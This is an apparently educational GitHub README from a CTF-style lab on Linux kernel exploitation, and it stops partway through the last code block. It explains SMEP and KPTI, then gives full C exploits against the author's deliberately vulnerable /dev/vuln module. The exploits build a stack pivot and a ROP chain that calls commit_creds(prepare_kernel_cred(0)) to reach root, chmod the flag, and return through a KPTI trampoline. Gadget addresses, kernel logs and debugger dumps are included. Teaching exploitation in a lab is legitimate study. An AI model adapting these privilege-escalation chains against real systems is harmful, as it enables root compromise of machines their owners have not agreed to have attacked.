Skip to content
Branch: master
Find file History
Permalink
Type Name Latest commit message Commit time
..
Failed to load latest commit information.
exploit finished rop Nov 6, 2019
image
src added gadgadget finding methods Nov 5, 2019
README.md Fix typo in README.md Nov 7, 2019
cr4.png added gadgadget finding methods Nov 5, 2019
kpti.png added working exploit bypassing kpti Nov 6, 2019
size.png added gadgadget finding methods Nov 5, 2019

README.md

SMEP + KPTI bypass

This time we are going to enable KPTI and SMEP and see how we can bypass these protections. First let's check out what theses exploit mitigations do.

SMEP

SMEP is an acronym for SupervisorModeExecutionPrevention. Basically it prevents ret2user by preventing the kernel from executing code in userspace.

You can check how SMEP is enabled in many ways. First, check out the results of cat /proc/cpuinfo | grep smep. If there are any matches, then SMEP is enabled.

Second, check out the bootscript of the qemu vm. In the previous lab, the boot script was this.

#!/bin/sh

qemu-system-x86_64 -initrd initramfs.cpio \
-kernel bzImage \
-append 'console=ttyS0 oops=panic panic=1 nokaslr' \
-monitor /dev/null \
-m 64M --nographic \
-smp cores=1,threads=1 \

However, if we add the following arguments to the boot script, SMEP becomes enabled.

#!/bin/sh

qemu-system-x86_64 -initrd initramfs.cpio \
-kernel bzImage \
-append 'console=ttyS0 oops=panic panic=1 nokaslr' \
-monitor /dev/null \
-m 64M --nographic \
-smp cores=1,threads=1 \
-cpu kvm64,smep

It's very obvious that under SMEP, our exploit does not work.

The third way to check if SMEP is enabled is by viewing the contents of the CR4 register. Either by causing a crash or attaching the kernel to a debugger, we can get the value of CR4.

[   24.335329] CR2: 000000000deacfd6 CR3: 0000000002b82000 CR4: 00000000001006f0

alt text

The 20th bit of the CR4 register indicates the SMEP flag, and we can validate that it is turned on (1<<20 == 0x100000).

KPTI

KPTI stands for Kernel Page Table Isolation. Its purpose is to mitigate meltdown in the linux kernel. Its main feature is to switch page tables when switching mode from kernel to user and vice versa, so that userspace page tables only have minimal kernel addresses in them.

But in KPTI, all userspace pages are mapped NX (not executable) in kernel page tables. This achieves something very similar to SMEP.

There are two ways to check if KPTI is enabled. The first way is to check out cat /proc/cpuinfo | grep pti. Notice that under the qemu argument -cpu kvm64,smep pti is enabled as well.

The second way is to inspect the page table of a process. However, to do this you need to be capable of 'view'ing physical memory. A kernel arbitrary read primitive is sufficient. All physical pages 0 ~ MAX are mapped to virtual address page_offset_base ~ page_offset_base + MAX. If you want to know why, read this material.

Also, if you have no background information in memory management and multilevel paging in linux, you should read this, or else everything below will not make any sense to you.

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/fcntl.h>
#include <sys/mman.h>
#include <sys/stat.h>

#define VULN_READ 0x1111
#define VULN_WRITE 0x2222
#define VULN_STACK 0x3333
#define VULN_PGD 0x4444

struct rwRequest {
	void *kaddr;
	void *uaddr;
	size_t length;
};

unsigned long pageOffsetBase = 0xffff888000000000;

int Open(char *fname, int mode) {
	int fd;
	if ((fd = open(fname, mode)) < 0) {
		perror("open");
		exit(-1);
	}
	return fd;
}

void write64(unsigned long kaddr, unsigned long value) {

	struct rwRequest req;
	unsigned long value_ = value;

	req.uaddr = &value_;
	req.length = 8;
	req.kaddr = (void *)kaddr;

	int fd = Open("/dev/vuln", O_RDONLY);

	if (ioctl(fd, VULN_WRITE, &req) < 0) {
		perror("ioctl");
		exit(-1);
	}
}

unsigned long read64(unsigned long kaddr) {

	struct rwRequest req;
	unsigned long value;;

	req.uaddr = &value;
	req.length = 8;
	req.kaddr = (void *)kaddr;

	int fd = Open("/dev/vuln", O_RDONLY);

	if (ioctl(fd, VULN_READ, &req) < 0) {
		perror("ioctl");
		exit(-1);
	}
	return value;
}

unsigned long leak_stack() {
	struct rwRequest req;
	unsigned long stack;

	int fd = Open("/dev/vuln", O_RDONLY);

	req.uaddr = &stack;
	if (ioctl(fd, VULN_STACK, &req) < 0) {
		perror("ioctl");
		exit(-1);
	}

	return stack;
}

unsigned long leak_pgd() {
	struct rwRequest req;
	unsigned long pgd;

	int fd = Open("/dev/vuln", O_RDONLY);

	req.uaddr = &pgd;
	if (ioctl(fd, VULN_PGD, &req) < 0) {
		perror("ioctl");
		exit(-1);
	}

	return pgd;
}

unsigned long pageTableWalk(unsigned long pgdir, unsigned long vaddr) {

	unsigned long index1 = (vaddr >> 39) & 0x1ff;
	unsigned long index2 = (vaddr >> 30) & 0x1ff;
	unsigned long index3 = (vaddr >> 21) & 0x1ff;
	unsigned long index4 = (vaddr >> 12) & 0x1ff;

	printf("index1: %lx, index2: %lx, index3: %lx index4: %lx\n", index1, index2, index3, index4);
	
	unsigned long lv1 = read64(pgdir + index1*8);
	if (!lv1) {
		printf("[!] lv1 is invalid\n");
		exit(-1);
	}
	printf("lv1: %lx\n", lv1);
	unsigned long lv2 = read64((((lv1 >> 12) & 0x3fffffff) << 12) + pageOffsetBase + index2*8);
	if (!lv2) {
		printf("[!] lv2 is invalid\n");
		exit(-1);
	}
	printf("lv2: %lx\n", lv2);
	
	unsigned long lv3 = read64((((lv2 >> 12) & 0x3fffffff) << 12) + pageOffsetBase + index3*8);
	if (!lv3) {
		printf("[!] lv3 is invalid\n");
		exit(-1);
	}
	printf("lv3: %lx\n", lv3);

	unsigned long lv4 = read64((((lv3 >> 12) & 0x3fffffff) << 12) + pageOffsetBase + index4*8);
	if (!lv4) {
		printf("[!] lv3 is invalid\n");
		exit(-1);
	}
	printf("lv4: %lx\n", lv4);
	
	unsigned long vaddr_alias = (((lv4 >> 12) & 0x3fffffff) << 12) + pageOffsetBase;
	printf("vaddr alias page: %p\n", (void *)vaddr_alias);
	unsigned long pte_addr = (((lv3 >> 12) & 0x3fffffff) << 12) + pageOffsetBase + index4*8;
	printf("pte address: %p\n", (void *)pte_addr);
	
	return pte_addr;
}

int main (int argc, char **argv){
	
	void *rwx = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
	if (rwx == MAP_FAILED) {
		perror("mmap");
		exit(-1);
	}

	void *rw = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
	if (rw == MAP_FAILED) {
		perror("mmap");
		exit(-1);
	}

	void *r = mmap(NULL, 0x1000, PROT_READ, MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
	if (r == MAP_FAILED) {
		perror("mmap");
		exit(-1);
	}

	memset(rwx, 0xcc, 0x1000);
	memset(rw, 0xcc, 0x1000);
	char a = ((char *)r)[0];

	unsigned long pgd = leak_pgd();

	printf("[*] page directory is at: %p\n", (void *)pgd);

	unsigned long rwx_pte = pageTableWalk(pgd, (unsigned long)rwx);
	unsigned long rw_pte = pageTableWalk(pgd, (unsigned long)rw);
	unsigned long r_pte = pageTableWalk(pgd, (unsigned long)r);

	printf("[*] RWX: %016lx\n", read64(rwx_pte));
	printf("[*] RW : %016lx\n", read64(rw_pte));
	printf("[*] R  : %016lx\n", read64(r_pte));
	
	return 0;
}

The code above is a helper script to find the address of the PTE (Page Table Entry) of a certain virtual address, when PGD is provided. So I decided to add the primitive of leaking the pgd in my vulnerable kernel module.

Also one thing to be very cautious is to make sure all the mmap'ed pages are touch'ed at least once, or else they will not be mapped to RAM. This is because of a mechanism called demand-on-paging, which means physical memory is mapped at the page fault handler. Before a page fault occurs, the kernel only stores information about that mapping and the actual mapping is not done.

if (cmd == 0x4444) {
		// return the top level page directory
		void *pgd = current_task->mm->pgd;
		if (copy_from_user(&req, (void *)arg, sizeof(req))) {
			printk(KERN_ERR "invalid address in pgd leak");
			return -EFAULT;
		}

		if (copy_to_user(req.uaddr, &pgd, sizeof(pgd))) {
			printk(KERN_ERR "invalid address in pgd leak");
			return -EFAULT;
		}
	}

Now using the page table walker, let's check out if userspace pages are actually all marked NX.

[*] RWX: 0000000001c19067
[*] RW : 8000000001c1a067
[*] R  : 80000000028a5225

Interestingly, PTE (lowest level entry)'s NX bit is not set. However, the PGDE (lv1)'s NX bit were set for all pages.

lv1: 8000000002b7b067

This design is much more reasonable, because the overhead for marking all PTEs is much larger than marking the NX bit for PGDE. This is because user pages will share PGDE because of the multilevel hierarchy. By the way, if we turn of SMEP/KPTI it shows

lv1: 2b37067

which explains why ret2usr attacks work. (The NX bit is not set)

Getting ROP

The bypass for Kernel SMEP/KPTI is analagous to NX bypass in userspace, which is ROP (return oriented programming). Triggering ROP in kernelspace requires a stack pivot, which is done by a stack pivot gadget. The basic idea is to place a ROP chain in a mmap'ed address and change the stack pointer to that address.

To find gadgets, we must first decompress the bzImage file. bzImage is a compressed version of the kernel image, so in order to find gadgets we need to decompress it using this script. It is included in the image directory, so to decompress the bzImage just do ./extract-vmlinux.sh bzImage > vmlinux.

Then run ROPgadget on vmlinux. ROPgadget --binary vmlinux > gadgets

It will take a long time because a kernel image is huge, unlike userspace programs. The number of gadgets is substantial.

alt text

The gadget here seems like a very nice stack pivot. 0xffffffff8149f601 : mov esp, 0xf7000000 ; ret

So we mmap the page 0xf7000000 and write an address to it. In this demo, we write the address 0xdeadbeefcafebebe.

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/fcntl.h>
#include <sys/mman.h>
#include <sys/stat.h>

#define VULN_READ 0x1111
#define VULN_WRITE 0x2222
#define VULN_STACK 0x3333
#define VULN_PGD 0x4444

struct rwRequest {
	void *kaddr;
	void *uaddr;
	size_t length;
};

unsigned long pageOffsetBase = 0xffff888000000000;

int Open(char *fname, int mode) {
	int fd;
	if ((fd = open(fname, mode)) < 0) {
		perror("open");
		exit(-1);
	}
	return fd;
}

void write64(unsigned long kaddr, unsigned long value) {

	struct rwRequest req;
	unsigned long value_ = value;

	req.uaddr = &value_;
	req.length = 8;
	req.kaddr = (void *)kaddr;

	int fd = Open("/dev/vuln", O_RDONLY);

	if (ioctl(fd, VULN_WRITE, &req) < 0) {
		perror("ioctl");
		exit(-1);
	}
}

unsigned long read64(unsigned long kaddr) {

	struct rwRequest req;
	unsigned long value;;

	req.uaddr = &value;
	req.length = 8;
	req.kaddr = (void *)kaddr;

	int fd = Open("/dev/vuln", O_RDONLY);

	if (ioctl(fd, VULN_READ, &req) < 0) {
		perror("ioctl");
		exit(-1);
	}
	return value;
}

int main (int argc, char **argv){
	
	// 0xffffffff8149f601 : mov esp, 0xf7000000 ; ret
	unsigned long *pivot_stack = mmap((void *)0xf7000000, 0x1000, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED, -1, 0);
	if (pivot_stack == MAP_FAILED) {
		perror("mmap");
		exit(-1);
	}
	
	pivot_stack[0] = 0xdeadbeefcafebebe;
	write64(0xffffffffc0002068, 0xffffffff8149f601);
	open("/dev/vuln", O_RDONLY);

	return 0;
}

The result is as expected.

[    7.678699] Call Trace:
[    7.679076]  <#DF>
[    7.679633]  dump_stack+0x46/0x5b
[    7.679735]  panic+0xca/0x218
[    7.679820]  df_debug+0x24/0x30
[    7.679899]  do_double_fault+0x95/0x120
[    7.679976]  double_fault+0x1e/0x30
[    7.680225] RIP: 0010:0xdeadbeefcafebebe
[    7.680410] Code: Bad RIP value.
[    7.680509] RSP: 0018:00000000f7000008 EFLAGS: 00000282
[    7.680670] RAX: ffffffff8149f601 RBX: ffffffffc0002480 RCX: ffff888003330920
[    7.680881] RDX: ffff888003ac8c40 RSI: ffff888003b8e800 RDI: ffff888002af25b8
[    7.681075] RBP: 0000000000000039 R08: 0000000000000000 R09: 0000000000000000
[    7.681285] R10: ffffc9000080fcc8 R11: 0000000000000000 R12: ffff888003b8e800
[    7.681510] R13: ffff888002af25b8 R14: ffffffffc0002000 R15: ffff888003b8e800

So it is confirmed that we have a ROP primitive now, what should we do?

Using ROP to get root

There are two ways, the dirty-and-easy way for CTFs (2) and a reliable way for real-world situations (1).

1. commit_creds(prepare_kernel_cred(0)) -> return to user safely via swapgs and iret
2. commit_creds(prepare_kernel_cred(0)) -> chmod 777 flag -> msleep(0x10000) while another process reads the flag

We are going to try out the dirty-and-easy way first.

Easy way: chmod 777 /flag

The 'semantics' of our ROP should be this

 1. RDI <- 0
 2. CALL PREPARE_KERNEL_CRED (0xffffffff8107c0a0)
 3. RDI <- RAX
 4. CALL COMMIT_CREDS (0xffffffff8107bd20)
 5. RDI <- 0xffffff9c
 6. RSI <- "flag"
 7. RDX <- 0777
 8. CALL CHMOD_INTERNAL (0xffffffff811a1b50)
 9. RDI <- 0x1000000
10. CALL MSLEEP (0xffffffff810c4730)

It you don't grasp what chmod_internal is, refer the readme in ret2usr tutorial.

In exploit code it is this:

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/fcntl.h>
#include <sys/mman.h>
#include <sys/stat.h>

#define VULN_READ 0x1111
#define VULN_WRITE 0x2222
#define VULN_STACK 0x3333
#define VULN_PGD 0x4444

struct rwRequest {
	void *kaddr;
	void *uaddr;
	size_t length;
};

unsigned long pageOffsetBase = 0xffff888000000000;

int Open(char *fname, int mode) {
	int fd;
	if ((fd = open(fname, mode)) < 0) {
		perror("open");
		exit(-1);
	}
	return fd;
}

void write64(unsigned long kaddr, unsigned long value) {

	struct rwRequest req;
	unsigned long value_ = value;

	req.uaddr = &value_;
	req.length = 8;
	req.kaddr = (void *)kaddr;

	int fd = Open("/dev/vuln", O_RDONLY);

	if (ioctl(fd, VULN_WRITE, &req) < 0) {
		perror("ioctl");
		exit(-1);
	}
}

unsigned long read64(unsigned long kaddr) {

	struct rwRequest req;
	unsigned long value;;

	req.uaddr = &value;
	req.length = 8;
	req.kaddr = (void *)kaddr;

	int fd = Open("/dev/vuln", O_RDONLY);

	if (ioctl(fd, VULN_READ, &req) < 0) {
		perror("ioctl");
		exit(-1);
	}
	return value;
}

unsigned long leak_stack() {
	struct rwRequest req;
	unsigned long stack;

	int fd = Open("/dev/vuln", O_RDONLY);

	req.uaddr = &stack;
	if (ioctl(fd, VULN_STACK, &req) < 0) {
		perror("ioctl");
		exit(-1);
	}

	return stack;
}

unsigned long leak_pgd() {
	struct rwRequest req;
	unsigned long pgd;

	int fd = Open("/dev/vuln", O_RDONLY);

	req.uaddr = &pgd;
	if (ioctl(fd, VULN_PGD, &req) < 0) {
		perror("ioctl");
		exit(-1);
	}

	return pgd;
}


int main (int argc, char **argv){
	
	// 0xffffffff8149f601 : mov esp, 0xf7000000 ; ret
	unsigned long gadget = 0xffffffff8149f601;

	// 0xffffffff81001219 : pop rdi ; ret 
	unsigned long pop_rdi = 0xffffffff81001219;

	// 0xffffffff81001a5c : pop rsi ; ret
	unsigned long pop_rsi = 0xffffffff81001a5c;

	// 0xffffffff81042ef7 : pop rdx ; ret
	unsigned long pop_rdx = 0xffffffff81042ef7;

	//0xffffffff828b16ec : push rax ; jmp rsi
	unsigned long push_rax = 0xffffffff828b16ec;

	// 0xffffffff81023771 : pop rax ; ret
	unsigned long pop_rax = 0xffffffff81023771;

	unsigned long commit_creds = 0xffffffff8107bd20;
	unsigned long prepare_kernel_cred = 0xffffffff8107c0a0;
	unsigned long chmod_internal = 0xffffffff811a1b50;
	unsigned long msleep = 0xffffffff810c4730;

	int i = 0x1000/8;

	unsigned long *pivot_stack = mmap((void *)0xf7000000-0x1000, 0x1000+0x1000, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED, -1, 0);
	if (pivot_stack == MAP_FAILED) {
		perror("mmap");
		exit(-1);
	}
	
	/*
	 1. RDI <- 0
	 2. CALL COMMIT_CREDS (0xffffffff8107c0a0)
	 3. RDI <- RAX
	 4. CALL PREPARE_KERNEL_CRED (0xffffffff8107bd20)
	 5. RDI <- 0xffffff9c
	 6. RSI <- "flag"
	 7. RDX <- 0777
	 8. CALL CHMOD_INTERNAL (0xffffffff811a1b50)
	 9. RDI <- 0x1000000
	10. CALL MSLEEP (0xffffffff810c4730)
	*/

	char *flag_str = "/flag";

	// touch the first page so that it doesn't fault
	pivot_stack[0] = 0xcafedeadbeef;

	pivot_stack[i++] = pop_rdi;
	pivot_stack[i++] = 0;
	pivot_stack[i++] = prepare_kernel_cred;
	pivot_stack[i++] = pop_rsi;
	pivot_stack[i++] = pop_rax;
	pivot_stack[i++] = push_rax;
	pivot_stack[i++] = commit_creds;

	pivot_stack[i++] = pop_rdi;
	pivot_stack[i++] = 0xffffff9c;
	pivot_stack[i++] = pop_rsi;
	pivot_stack[i++] = flag_str;
	pivot_stack[i++] = pop_rdx;
	pivot_stack[i++] = 0777;
	pivot_stack[i++] = chmod_internal;

	pivot_stack[i++] = pop_rdi;
	pivot_stack[i++] = 0x1000000;
	pivot_stack[i++] = msleep;


	write64(0xffffffffc0002068, gadget);
	open("/dev/vuln", O_RDONLY);

	return 0;
}

There are two things to be cautious of. First, mmap'ed pages are not in the page table before they are accessed. If you don't 'touch' the pages they will cause a double fault in the kernel. Second, the pivot stack must be wide in both directions due to kernel function calls (ex. commit_creds) as they use the stack and not allocating memory before vaddr 0xf7000000 will cause an uncatchable page fault. Using MAP_GROWSDOWN does not work, as they are for userspace stack growth and thus not catchable in kernel space.

Now if we execute this something very interesting pops up.

/ $ [    6.688926] kernel tried to execute NX-protected page - exploit attempt? (uid: 1000)
[    6.689337] BUG: unable to handle kernel paging request at ffffffff828b16ec
[    6.689682] PGD 220c067 P4D 220c067 PUD 220d063 PMD 30bb063 PTE 80000000028b1063
[    6.690234] Oops: 0011 [#1] SMP PTI
[    6.690572] CPU: 0 PID: 1034 Comm: runme Tainted: P           O      4.19.76 #1
[    6.691218] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1ubuntu1 04/01/2014
[    6.691829] RIP: 0010:0xffffffff828b16ec

It says the push_rax gadget is in an NX page. So ROPgadget literally threw shit gadgets at us, as it does not check page permissions when finding gadgets. So we must find other gadgets that are actually inside legit code segments. For this we should check which regions are RX and specify that range as an argument to ROPgadget.

So first, readelf -S vmlinux to check RX pages, then pass it as an argument to ROPgadget. ROPgadget --binary vmlinux --range 0xffffffff81000000-0xffffffff81c031d4 > gadgets

Since we couldn't use the pop rax gadget, we use this instead to write a chain for the semantic RDI<-RAX.

0xffffffff810cf971 : mov rdi, rax ; jne 0xffffffff810cf959 ; ret

But before it we must make sure that JNE doesn't branch, so we use this gadget to set the flags appropriately.

0xffffffff8147a56e : cmp rdx, 8 ; jne 0xffffffff8147a55f ; ret

So our new exploit is this.

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/fcntl.h>
#include <sys/mman.h>
#include <sys/stat.h>

#define VULN_READ 0x1111
#define VULN_WRITE 0x2222
#define VULN_STACK 0x3333
#define VULN_PGD 0x4444

struct rwRequest {
	void *kaddr;
	void *uaddr;
	size_t length;
};

unsigned long pageOffsetBase = 0xffff888000000000;

int Open(char *fname, int mode) {
	int fd;
	if ((fd = open(fname, mode)) < 0) {
		perror("open");
		exit(-1);
	}
	return fd;
}

void write64(unsigned long kaddr, unsigned long value) {

	struct rwRequest req;
	unsigned long value_ = value;

	req.uaddr = &value_;
	req.length = 8;
	req.kaddr = (void *)kaddr;

	int fd = Open("/dev/vuln", O_RDONLY);

	if (ioctl(fd, VULN_WRITE, &req) < 0) {
		perror("ioctl");
		exit(-1);
	}
}

unsigned long read64(unsigned long kaddr) {

	struct rwRequest req;
	unsigned long value;;

	req.uaddr = &value;
	req.length = 8;
	req.kaddr = (void *)kaddr;

	int fd = Open("/dev/vuln", O_RDONLY);

	if (ioctl(fd, VULN_READ, &req) < 0) {
		perror("ioctl");
		exit(-1);
	}
	return value;
}

unsigned long leak_stack() {
	struct rwRequest req;
	unsigned long stack;

	int fd = Open("/dev/vuln", O_RDONLY);

	req.uaddr = &stack;
	if (ioctl(fd, VULN_STACK, &req) < 0) {
		perror("ioctl");
		exit(-1);
	}

	return stack;
}

unsigned long leak_pgd() {
	struct rwRequest req;
	unsigned long pgd;

	int fd = Open("/dev/vuln", O_RDONLY);

	req.uaddr = &pgd;
	if (ioctl(fd, VULN_PGD, &req) < 0) {
		perror("ioctl");
		exit(-1);
	}

	return pgd;
}

int main (int argc, char **argv){
	
	// 0xffffffff8149f601 : mov esp, 0xf7000000 ; ret
	unsigned long gadget = 0xffffffff8149f601;

	// 0xffffffff81001219 : pop rdi ; ret 
	unsigned long pop_rdi = 0xffffffff81001219;

	// 0xffffffff81001a5c : pop rsi ; ret
	unsigned long pop_rsi = 0xffffffff81001a5c;

	// 0xffffffff81042ef7 : pop rdx ; ret
	unsigned long pop_rdx = 0xffffffff81042ef7;

	// 0xffffffff810cf971 : mov rdi, rax ; jne 0xffffffff810cf959 ; ret
	unsigned long mov_rdi_rax = 0xffffffff810cf971;

	// 0xffffffff8147a56e : cmp rdx, 8 ; jne 0xffffffff8147a55f ; ret
	unsigned long cmp = 0xffffffff8147a56e;

	unsigned long commit_creds = 0xffffffff8107bd20;
	unsigned long prepare_kernel_cred = 0xffffffff8107c0a0;
	unsigned long chmod_internal = 0xffffffff811a1b50;
	unsigned long msleep = 0xffffffff810c4730;

	int i = 0x1000/8;

	unsigned long *pivot_stack = mmap((void *)0xf7000000-0x1000, 0x1000+0x1000, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED, -1, 0);
	if (pivot_stack == MAP_FAILED) {
		perror("mmap");
		exit(-1);
	}
	
	/*
	 1. RDI <- 0
	 2. CALL PREPARE_KERNEL_CRED (0xffffffff8107c0a0)
	 3. RDI <- RAX
	 4. CALL COMMIT_CREDS (0xffffffff8107bd20)
	 5. RDI <- 0xffffff9c
	 6. RSI <- "flag"
	 7. RDX <- 0777
	 8. CALL CHMOD_INTERNAL (0xffffffff811a1b50)
	 9. RDI <- 0x1000000
	10. CALL MSLEEP (0xffffffff810c4730)
	*/

	char *flag_str = "/flag";

	// touch the first page so that it doesn't fault
	pivot_stack[0] = 0xcafedeadbeef;

	pivot_stack[i++] = pop_rdi;
	pivot_stack[i++] = 0;
	pivot_stack[i++] = prepare_kernel_cred;
	pivot_stack[i++] = pop_rdx;
	pivot_stack[i++] = 8;
	pivot_stack[i++] = cmp;
	pivot_stack[i++] = mov_rdi_rax;
	pivot_stack[i++] = commit_creds;

	pivot_stack[i++] = pop_rdi;
	pivot_stack[i++] = 0xffffff9c;
	pivot_stack[i++] = pop_rsi;
	pivot_stack[i++] = flag_str;
	pivot_stack[i++] = pop_rdx;
	pivot_stack[i++] = 0777;
	pivot_stack[i++] = chmod_internal;

	pivot_stack[i++] = pop_rdi;
	pivot_stack[i++] = 0x1000000;
	pivot_stack[i++] = msleep;


	write64(0xffffffffc0002068, gadget);
	open("/dev/vuln", O_RDONLY);

	return 0;
}

And by the way, to debug our ROP, we should attach a debugger, and set a breakpoint on the stack pivot gadget (0xffffffff8149f601: mov rsp, 0xf7000000 ; ret). This is what it looks like.

─────────────────────────────────[ REGISTERS ]──────────────────────────────────
 RAX  0xffffffff8149f601 ◂— 0x8008c3f7000000bc
 RBX  0xffffffffc0002480 ◂— 0x39 /* '9' */
 RCX  0xffff888003376920 —▸ 0xffff888002c04540 ◂— add    byte ptr [rax], al /* 0x200200000 */
 RDX  0xffff8880031abd40 ◂— 0
 RDI  0xffff888002b225b8 ◂— mov    dh, 0x21 /* 0xd21b6 */
 RSI  0xffff888003eecf00 ◂— 0
 R8   0x0
 R9   0x0
 R10  0xffffc900000afcc8 ◂— 0x0
 R11  0x0
 R12  0xffff888003eecf00 ◂— 0
 R13  0xffff888002b225b8 ◂— mov    dh, 0x21 /* 0xd21b6 */
 R14  0xffffffffc0002000 ◂— 0
 R15  0xffff888003eecf00 ◂— 0
 RBP  0x39
 RSP  0xffffc900000afc60 —▸ 0xffffffff8143f7f2 ◂— 0x74e868391aebc389
 RIP  0xffffffff8149f601 ◂— 0x8008c3f7000000bc
───────────────────────────────────[ DISASM ]───────────────────────────────────
 ► 0xffffffff8149f601    mov    esp, 0xf7000000
   0xffffffff8149f606    ret    
    ↓
   0xffffffff81001219    pop    rdi
   0xffffffff8100121a    ret    
    ↓
   0xffffffff8107c0a0    push   rbp
   0xffffffff8107c0a1    mov    rbp, rdi
   0xffffffff8107c0a4    mov    rdi, qword ptr [rip + 0x18418b5]
   0xffffffff8107c0ab    push   rbx
   0xffffffff8107c0ac    mov    esi, 0x6000c0
   0xffffffff8107c0b1    call   0xffffffff81199180
 
   0xffffffff8107c0b6    test   rax, rax
───────────────────────────────────[ STACK ]────────────────────────────────────
00:0000│ rsp  0xffffc900000afc60 —▸ 0xffffffff8143f7f2 ◂— 0x74e868391aebc389
01:0008│      0xffffc900000afc68 —▸ 0xffff888003228700 —▸ 0xffffffff82077e44 ◂— 0x616562006373696d /* 'misc' */
02:0010│      0xffffc900000afc70 —▸ 0xffff888002b225b8 ◂— mov    dh, 0x21 /* 0xd21b6 */
03:0018│      0xffffc900000afc78 —▸ 0xffff888003eecf00 ◂— 0
04:0020│      0xffffc900000afc80 —▸ 0xffffffff81e6d3e0 ◂— 0x0
05:0028│      0xffffc900000afc88 ◂— 0x0
06:0030│      0xffffc900000afc90 —▸ 0xffffffff811a8b49 ◂— 0xed312275c589c085
07:0038│      0xffffc900000afc98 ◂— 0x0
─────────────────────────────────[ BACKTRACE ]──────────────────────────────────
 ► f 0 ffffffff8149f601
   f 1 ffffffff8143f7f2
   f 2 ffff888003228700
   f 3 ffff888002b225b8
   f 4 ffff888003eecf00
   f 5 ffffffff81e6d3e0
   f 6                0
────────────────────────────────────────────────────────────────────────────────

The result of our exploit is a success, we can read the flag.

/ $ /home/ctf/runme &
/ $ ls -al /flag
-rwxrwxrwx    1 root     root            24 Nov  2 07:32 /flag
/ $ cat flag
this is an example flag

Now let's move on to the hard and proper way.

Bypassing SMEP+KPTI via ROP

We know how SMEP and KPTI works now. So we can also speculate how they can be disabled. For SMEP, we simply need to change the CR4 register so that it's 20th bit is turned off. KPTI is a bit more complicated. If we have arbitrary read/write and if we can locate the page table of the current process then KPTI can be disabled easily by turning off the NX bit via memory write. But this is way too much. Also if we have arbitrary read and write, we don't need to worry about any of this, as we can simply locate the cred structure and overwrite the uid, gid, euid fields. We need to think of a way that is feasible in ROP.

In many exploitation techniques, the core idea is to mimic what a normal routine does as close as possible. The core idea is to execute commit_creds(prepare_kernel_cred(0)) and do exactly what a kernel function does to return safely to user mode. We can do this easily by making use of already existing kernel code. In syscall return, there should be a stub of code that swaps the page table to usermode, swapgs and iret. I found this idea from this great write-up from the PerfectBlue CTF team, where they called it a KPTI exit trampoline.

So let's try it out. First we need to find the address for our trampoline as well. In the linux source code I found this code.

GLOBAL(swapgs_restore_regs_and_return_to_usermode)
#ifdef CONFIG_DEBUG_ENTRY
	/* Assert that pt_regs indicates user mode. */
	testb	$3, CS(%rsp)
	jnz	1f
	ud2
1:
#endif
	POP_REGS pop_rdi=0

	/*
	 * The stack is now user RDI, orig_ax, RIP, CS, EFLAGS, RSP, SS.
	 * Save old stack pointer and switch to trampoline stack.
	 */
	movq	%rsp, %rdi
	movq	PER_CPU_VAR(cpu_tss_rw + TSS_sp0), %rsp

	/* Copy the IRET frame to the trampoline stack. */
	pushq	6*8(%rdi)	/* SS */
	pushq	5*8(%rdi)	/* RSP */
	pushq	4*8(%rdi)	/* EFLAGS */
	pushq	3*8(%rdi)	/* CS */
	pushq	2*8(%rdi)	/* RIP */

	/* Push user RDI on the trampoline stack. */
	pushq	(%rdi)

	/*
	 * We are on the trampoline stack.  All regs except RDI are live.
	 * We can do future final exit work right here.
	 */
	STACKLEAK_ERASE_NOCLOBBER

	SWITCH_TO_USER_CR3_STACK scratch_reg=%rdi

	/* Restore RDI. */
	popq	%rdi
	SWAPGS
	INTERRUPT_RETURN

Let's try to find where this is in our kernel. First we open up vmlinux on our favorite disassembler/analyzer. However, there are no symbols. I check /proc/kallsyms and luckily I could find it.

/ # cat /proc/kallsyms | grep swapgs
ffffffff81a00a2f T swapgs_restore_regs_and_return_to_usermode

On IDA it looks like this:

.text:FFFFFFFF81A00A65                 mov     rdi, cr3
.text:FFFFFFFF81A00A68                 jmp     short loc_FFFFFFFF81A00A9E

									   ...

.text:FFFFFFFF81A00A9E                 or      rdi, 1000h
.text:FFFFFFFF81A00AA5                 mov     cr3, rdi
.text:FFFFFFFF81A00AA8                 pop     rax
.text:FFFFFFFF81A00AA9                 pop     rdi
.text:FFFFFFFF81A00AAA                 swapgs
.text:FFFFFFFF81A00AAD                 jmp     short loc_FFFFFFFF81A00AD0

									   ...

.text:FFFFFFFF81A00AD0                 test    byte ptr [rsp+20h], 4
.text:FFFFFFFF81A00AD5                 jnz     short loc_FFFFFFFF81A00AD9
.text:FFFFFFFF81A00AD7                 iretq

It's nearly exactly similar to the assembly stub in PerfectBlue's write-up.

So our ROP should be: PRIVESC ROP(prepare kernel_cred, commit_creds) || KPTI_TRAMPLONE || USERSPACE_RAX || USERSPACE_RDI || STUFF NEEDED FOR IRETQ STUFF NEEDED FOR IRETQ is discussed in ret2usr tutorial, so if you don't know please check it out.

So this is my working exploit.

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/fcntl.h>
#include <sys/mman.h>
#include <sys/stat.h>

#define VULN_READ 0x1111
#define VULN_WRITE 0x2222
#define VULN_STACK 0x3333
#define VULN_PGD 0x4444

struct rwRequest {
	void *kaddr;
	void *uaddr;
	size_t length;
};

unsigned long pageOffsetBase = 0xffff888000000000;

int Open(char *fname, int mode) {
	int fd;
	if ((fd = open(fname, mode)) < 0) {
		perror("open");
		exit(-1);
	}
	return fd;
}

void write64(unsigned long kaddr, unsigned long value) {

	struct rwRequest req;
	unsigned long value_ = value;

	req.uaddr = &value_;
	req.length = 8;
	req.kaddr = (void *)kaddr;

	int fd = Open("/dev/vuln", O_RDONLY);

	if (ioctl(fd, VULN_WRITE, &req) < 0) {
